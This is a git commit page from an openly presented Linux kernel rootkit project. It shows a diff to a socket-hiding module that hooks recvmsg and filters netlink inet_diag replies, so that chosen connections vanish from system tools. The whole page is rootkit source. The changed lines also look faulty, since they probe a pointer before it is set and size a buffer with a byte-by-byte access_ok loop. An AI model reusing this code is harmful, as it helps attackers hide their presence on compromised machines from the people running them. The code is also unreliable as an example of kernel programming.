linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit b3cd56b360ae1d5f19364cc62ff4af48a493067f
parent 737cd0f3f03c43c0bf0e89a79c14e497fbb04f32
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 13 Dec 2020 05:47:38 +0100

access_ok hack

Diffstat:
Msrc/sockhide.c | 8++++++--
1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/src/sockhide.c b/src/sockhide.c @@ -171,11 +171,15 @@ g7_recvmsg(struct pt_regs *pt_regs) if ((len = ret = sys_recvmsg(pt_regs)) < 0) return ret; - nh = (struct nlsmsghdr *)kvmalloc(len, GFP_KERNEL); + int bytes = 0; + while (access_ok(nh + bytes, 1)) + ++bytes; + + nh = (struct nlmsghdr *)kvmalloc(bytes, GFP_KERNEL); copy_from_user(nh, (struct nlmsghdr *)((struct user_msghdr *)pt_regs->si)->msg_iov->iov_base, - len); + bytes); while (nh && NLMSG_OK(nh, len)) { int src = ntohs(((struct inet_diag_msg *)NLMSG_DATA(nh))->id.idiag_sport);